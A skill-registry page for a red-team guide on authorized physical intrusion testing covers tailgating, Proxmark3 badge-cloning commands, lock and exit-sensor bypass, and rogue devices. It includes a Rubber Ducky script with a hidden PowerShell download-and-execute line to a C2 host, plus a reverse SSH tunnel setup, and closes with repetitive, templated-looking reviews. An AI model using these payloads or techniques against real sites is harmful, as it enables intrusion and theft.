performing-physical-intrusion-assessment▌
mukul975/Anthropic-Cybersecurity-Skills · updated May 25, 2026
MDX-style export adds YAML metadata + attribution linking explainx.ai and this canonical listing URL.
Conduct authorized physical penetration testing using tailgating, badge cloning, lock bypassing, and rogue device deployment to evaluate facility security controls.
| name | performing-physical-intrusion-assessment |
| description | Conduct authorized physical penetration testing using tailgating, badge cloning, lock bypassing, and rogue device deployment to evaluate facility security controls. |
| domain | cybersecurity |
| subdomain | red-teaming |
| tags | - physical-security - red-team - tailgating - badge-cloning - lock-picking - rfid - physical-pentest |
| version | '1.0' |
| author | mahipal |
| license | Apache-2.0 |
| d3fend_techniques | - Platform Hardening - Hardware Component Inventory - Electromagnetic Radiation Hardening - RF Shielding - Asset Inventory |
| nist_csf | - ID.RA-01 - GV.OV-02 - DE.AE-07 |
Performing Physical Intrusion Assessment
Overview
Physical intrusion assessment evaluates an organization's physical security controls by attempting to gain unauthorized access to facilities, server rooms, and restricted areas. This includes tailgating employees, cloning RFID access badges, bypassing locks, deploying rogue network devices, and testing security guard procedures. Physical security testing is a critical component of full-scope red team engagements, as it often provides the most direct path to network access. MITRE ATT&CK maps physical access techniques under T1200 (Hardware Additions) and T1091 (Replication Through Removable Media).
When to Use
- When conducting security assessments that involve performing physical intrusion assessment
- When following incident response procedures for related security events
- When performing scheduled security testing or auditing activities
- When validating security controls through hands-on testing
Prerequisites
- Signed authorization letter (carry at all times during assessment)
- Emergency contact for client security team (24/7)
- Get-out-of-jail letter signed by executive authority
- Physical security testing toolkit
- Body camera or documentation equipment
- Disguise/cover identity materials (uniform, badge, clipboard)
MITRE ATT&CK Mapping
| Technique ID | Name | Tactic |
|---|---|---|
| T1200 | Hardware Additions | Initial Access |
| T1091 | Replication Through Removable Media | Initial Access |
| T1199 | Trusted Relationship | Initial Access |
| T1078 | Valid Accounts | Initial Access |
Physical Security Testing Toolkit
| Tool | Purpose | Approximate Cost |
|---|---|---|
| Proxmark3 RDV4 | RFID badge cloning (125kHz/13.56MHz) | $300 |
| Flipper Zero | Multi-protocol RF analysis | $170 |
| Lock pick set (Sparrows) | Mechanical lock bypassing | $35 |
| Under-door tool (UDT) | Bypass door from outside | $30 |
| Shove knife / latch slip | Spring bolt bypass | $15 |
| LAN Turtle | Rogue network implant | $60 |
| WiFi Pineapple | Rogue wireless AP | $100 |
| Rubber Ducky / Bash Bunny | USB keystroke injection | $50-80 |
| Clipboard + hard hat + hi-vis | Social engineering props | $20 |
| Body camera | Evidence documentation | $50 |
Technique 1: Tailgating
Tailgating involves following an authorized person through a secured entry point without presenting credentials.
Methods:
- Hands full approach: Carry boxes/equipment, ask someone to hold the door
- Smoke break return: Wait near smoking area, follow employees back inside
- Delivery driver: Wear delivery uniform, carry packages
- Busy entrance timing: Enter during shift change or lunch rush
- Door propping: Observe if employees prop doors open
Countermeasures to test:
- Turnstiles / mantraps
- Security guard challenge procedures
- Piggybacking detection systems
- Employee security awareness
Technique 2: Badge Cloning
# Proxmark3 - Read a low-frequency (125kHz) HID card
proxmark3> lf hid read
# Output: HID Prox TAG ID: 2006xxxxxx - FC: 123 CN: 45678
# Clone to a T5577 blank card
proxmark3> lf hid clone --fc 123 --cn 45678
# Read high-frequency (13.56MHz) MIFARE card
proxmark3> hf mf rdbl --blk 0 -k FFFFFFFFFFFF
# Long-range capture with custom antenna (up to 3 feet)
proxmark3> lf hid read # with extended antenna
# Flipper Zero - Read and emulate
# RFID > Read > Hold card to Flipper > Save > Emulate
Badge cloning attack flow:
- Position near badge reader (elevator, door entry)
- Read badge wirelessly as employee passes (1-3 second window)
- Clone to blank card
- Use cloned badge to access secured areas
- Document which areas were accessible
Technique 3: Lock Bypassing
| Lock Type | Bypass Method | Difficulty |
|---|---|---|
| Pin tumbler (standard) | Pick, rake, or bump key | Easy-Medium |
| Wafer lock (filing cabinets) | Pick or jiggle | Easy |
| Tubular lock (vending, server) | Tubular pick tool | Easy |
| Electronic lock (keypad) | Shoulder surf, thermal camera | Medium |
| Magnetic lock (mag lock) | Under-door tool, REX sensor bypass | Medium |
| Smart lock (Bluetooth) | Replay attack, firmware exploit | Hard |
# Electronic keypad - thermal imaging after use
# Warmer keys = more recently pressed
# Use FLIR camera to capture heat signatures within 30 seconds
# REX (Request to Exit) sensor bypass
# Insert thin wire or use a can of compressed air to trigger motion sensor
# on the inside of a mag-locked door
Technique 4: Rogue Device Deployment
# LAN Turtle - Plug into exposed Ethernet port
# Provides SSH reverse tunnel back to C2 server
# Auto-configures as man-in-the-middle
# Configure LAN Turtle for reverse SSH
# Module: AutoSSH
# Host: c2.redteam.com
# Port: 22
# Remote port: 2222
# WiFi Pineapple - Deploy in common area
# Captures wireless credentials via evil twin attack
# Exfiltrates data over cellular modem
# USB Rubber Ducky - Drop in parking lot or leave on desk
# Payload: Download and execute C2 agent
# Duckyscript:
# DELAY 1000
# GUI r
# DELAY 500
# STRING powershell -w hidden -c "IEX(New-Object Net.WebClient).DownloadString('https://c2.redteam.com/stager.ps1')"
# ENTER
Technique 5: Dumpster Diving
Search external waste containers and recycling bins for:
- Printed documents with sensitive information
- Employee directories and org charts
- Network diagrams and IP addresses
- Shredded documents (cross-cut vs strip-cut assessment)
- Discarded hardware (hard drives, USB drives)
Assessment Methodology
Pre-Assessment Reconnaissance
- Perimeter walk - identify all entry points, cameras, guard posts
- Observe employee patterns - shift changes, break schedules
- Identify badge technology (HID, MIFARE, iCLASS)
- Map camera coverage and blind spots
- Note security guard patrol routes and timing
Execution Phases
- External perimeter: Fencing, gates, parking barriers
- Building entry: Main entrance, side doors, loading dock
- Internal access: Floor access, elevator controls
- Restricted areas: Server rooms, executive offices, data centers
- Device deployment: Network implants, rogue wireless
Documentation Requirements
- Timestamp and location for every access attempt
- Photos/video of successful entries
- Badge reader locations that accepted cloned credentials
- Unlocked doors, propped doors, tailgating opportunities
- Network ports accessible in public areas
- Evidence of data in waste containers
Ethical and Safety Considerations
- Always carry authorization letter - Be prepared to identify yourself immediately if confronted
- Never force entry - If a technique damages property, document and skip
- Immediate stop if law enforcement is called before deconfliction
- Never photograph individuals without authorization
- Document, don't exploit - Take photos as evidence, don't steal actual data
- Safety first - Do not enter hazardous areas or bypass fire safety
References
- ISACA Physical Penetration Testing White Paper (2023)
- ASIS Physical Security Professional (PSP) guidelines
- NIST SP 800-116 Rev. 1: Smart Card PIV guidelines
- Deviant Ollam - Physical Security Assessment methodology
- MITRE ATT&CK T1200: https://attack.mitre.org/techniques/T1200/
How to use performing-physical-intrusion-assessment on Cursor
AI-first code editor with Composer
Prerequisites
Before installing skills in Cursor, ensure your development environment meets these requirements:
- ›Cursor installed and configured on your development machine
- ›Node.js version 16.0+ with npm package manager (verify with
node --version) - ›Active project directory or workspace where you want to add performing-physical-intrusion-assessment
Execute installation command
Execute the skills CLI command in your project's root directory to begin installation:
The skills CLI fetches performing-physical-intrusion-assessment from GitHub repository mukul975/Anthropic-Cybersecurity-Skills and configures it for Cursor.
Select Cursor when prompted
The CLI will show a list of available agents. Use arrow keys to navigate and space to select Cursor:
Verify installation
Confirm successful installation by checking the skill directory location:
Reload or restart Cursor to activate performing-physical-intrusion-assessment. Access the skill through slash commands (e.g., /performing-physical-intrusion-assessment) or your agent's skill management interface.
Security & Verification Notice
We perform automated surface-level scans (Gen AI Scanner, Socket, Snyk) during installation. These checks detect common vulnerabilities but do not guarantee complete security. Always review skill source code and verify the publisher's reputation before production use.
Skills execute code in your development environment. Always verify the publisher's identity, review recent commits, and test in isolated environments before production deployment.
List & Monetize Your Skill
Submit your Claude Code skill and start earning
Use Cases▌
Task Automation & Efficiency
Automate repetitive workflows and reduce manual effort
Example
Generate reports, summarize documents, draft communications
Save 3-5 hours per week on routine tasks
Knowledge Enhancement
Learn new skills, understand complex topics, get expert guidance
Example
Explain concepts, provide examples, suggest learning resources
Accelerate learning and skill development by 2x
Quality Improvement
Enhance output quality through reviews, suggestions, and refinements
Example
Review drafts, suggest improvements, catch errors
Improve work quality by 30-40% with less effort
Implementation Guide▌
Prerequisites
- ›Claude Desktop or compatible AI client with skill support
- ›Clear understanding of task or problem to solve
- ›Willingness to iterate and refine outputs
Time Estimate
15-45 minutes depending on use case complexity
Installation Steps
- 1.Install skill using provided installation command
- 2.Test with simple use case relevant to your work
- 3.Evaluate output quality and relevance
- 4.Iterate on prompts to improve results
- 5.Integrate into regular workflow if valuable
Common Pitfalls
- ⚠Expecting perfect results without iteration
- ⚠Not providing enough context in prompts
- ⚠Using skill for tasks outside its intended scope
- ⚠Accepting outputs without review and validation
Best Practices▌
✓ Do
- +Start with clear, specific prompts
- +Provide relevant context and constraints
- +Review and refine all outputs before using
- +Iterate to improve output quality
- +Document successful prompt patterns
✗ Don't
- −Don't use without understanding skill limitations
- −Don't skip validation of outputs
- −Don't share sensitive information in prompts
- −Don't expect skill to replace human judgment
💡 Pro Tips
- ★Be specific about desired format and style
- ★Ask for multiple options to choose from
- ★Request explanations to understand reasoning
- ★Combine AI efficiency with human expertise
When to Use This▌
✓ Use When
Use when skill capabilities match your task, clear ROI on time saved, and you can validate outputs. Best for repetitive tasks, learning, and quality improvement.
✗ Avoid When
Avoid when task requires deep expertise you can't validate, involves sensitive decisions, or when learning process is more valuable than speed of completion.
Learning Path▌
- 1Familiarize yourself with skill capabilities and limitations
- 2Start with low-risk, non-critical tasks
- 3Progress to more complex and valuable use cases
- 4Build expertise through regular use and experimentation
Discussion
Product Hunt–style comments (not star reviews)- No comments yet — start the thread.
Ratings
4.7★★★★★52 reviews- ★★★★★Mei Park· Dec 28, 2024
Registry listing for performing-physical-intrusion-assessment matched our evaluation — installs cleanly and behaves as described in the markdown.
- ★★★★★Dhruvi Jain· Dec 24, 2024
Registry listing for performing-physical-intrusion-assessment matched our evaluation — installs cleanly and behaves as described in the markdown.
- ★★★★★Diego Haddad· Dec 16, 2024
performing-physical-intrusion-assessment fits our agent workflows well — practical, well scoped, and easy to wire into existing repos.
- ★★★★★Diego Khan· Dec 12, 2024
Useful defaults in performing-physical-intrusion-assessment — fewer surprises than typical one-off scripts, and it plays nicely with `npx skills` flows.
- ★★★★★Evelyn Zhang· Dec 8, 2024
We added performing-physical-intrusion-assessment from the explainx registry; install was straightforward and the SKILL.md answered most questions upfront.
- ★★★★★Mei Jackson· Nov 19, 2024
Keeps context tight: performing-physical-intrusion-assessment is the kind of skill you can hand to a new teammate without a long onboarding doc.
- ★★★★★Oshnikdeep· Nov 15, 2024
Keeps context tight: performing-physical-intrusion-assessment is the kind of skill you can hand to a new teammate without a long onboarding doc.
- ★★★★★Ava Abbas· Nov 7, 2024
performing-physical-intrusion-assessment is among the better-maintained entries we tried; worth keeping pinned for repeat workflows.
- ★★★★★Mia Jain· Nov 3, 2024
I recommend performing-physical-intrusion-assessment for anyone iterating fast on agent tooling; clear intent and a small, reviewable surface area.
- ★★★★★Maya Ramirez· Oct 26, 2024
Solid pick for teams standardizing on skills: performing-physical-intrusion-assessment is focused, and the summary matches what you get after install.
showing 1-10 of 52